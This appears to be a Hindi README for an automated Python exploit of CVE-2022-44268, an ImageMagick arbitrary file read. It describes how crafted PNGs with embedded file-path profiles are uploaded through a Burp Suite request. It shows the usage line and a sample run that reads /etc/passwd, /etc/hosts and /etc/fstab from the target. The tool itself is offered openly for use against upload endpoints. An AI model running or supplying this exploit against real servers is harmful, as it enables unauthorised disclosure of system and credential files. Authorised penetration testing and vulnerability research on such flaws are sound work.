
CVE-2022-44268 (ImageMagick मनमाना फ़ाइल पढ़ना) के लिए स्वचालित Python exploit। तैयार किए गए PNGs अपलोड करता है, लौटाई गई छवियों से फ़ाइल सामग्री निकालता है, और परिणाम स्थानीय रूप से सहेजता है।
स्वचालित पायथन स्क्रिप्ट जो cve-2022-44268 का उपयोग करके एक इनपुट फ़ाइल में इनपुट फ़ाइलसूची से फ़ाइलनाम के साथ एक प्रोफ़ाइल मान जोड़ती है, बर्प्सुइट (पहले से शामिल) से इनपुट request.req फ़ाइल का उपयोग करके प्रत्येक संशोधित छवि को अपलोड करते हुए छवि फ़ाइल अपलोड को अपडेट करती है, और लौटाए गए url से लौटाई गई छवियों को डाउनलोड करती है तथा फ़ाइल सामग्री निकालकर एक इनपुट निर्देशिका में रखती है।
$ ./cve-2022-44268.py
usage: cve-2022-44268.py [-h] base_png filelist request_req output_dir image_output_dir
cve-2022-44268.py: error: the following arguments are required: base_png, filelist, request_req, output_dir, image_output_dir
$ ./cve-2022-44268.py image.png filelist.lst request.req output_dir image_output_dir
फ़ाइल /etc/passwd के लिए शोषण किया जा रहा है
संकुचित छवि सहेजी गई: image_output_dir/etc_passwd_shrunk.png
निकाली गई सामग्री सहेजी गई: output_dir/etc_passwd
फ़ाइल /etc/hosts के लिए शोषण किया जा रहा है
संकुचित छवि सहेजी गई: image_output_dir/etc_hosts_shrunk.png
निकाली गई सामग्री सहेजी गई: output_dir/etc_hosts
फ़ाइल /etc/fstab के लिए शोषण किया जा रहा है
संकुचित छवि सहेजी गई: image_output_dir/etc_fstab_shrunk.png
निकाली गई सामग्री सहेजी गई: output_dir/etc_fstab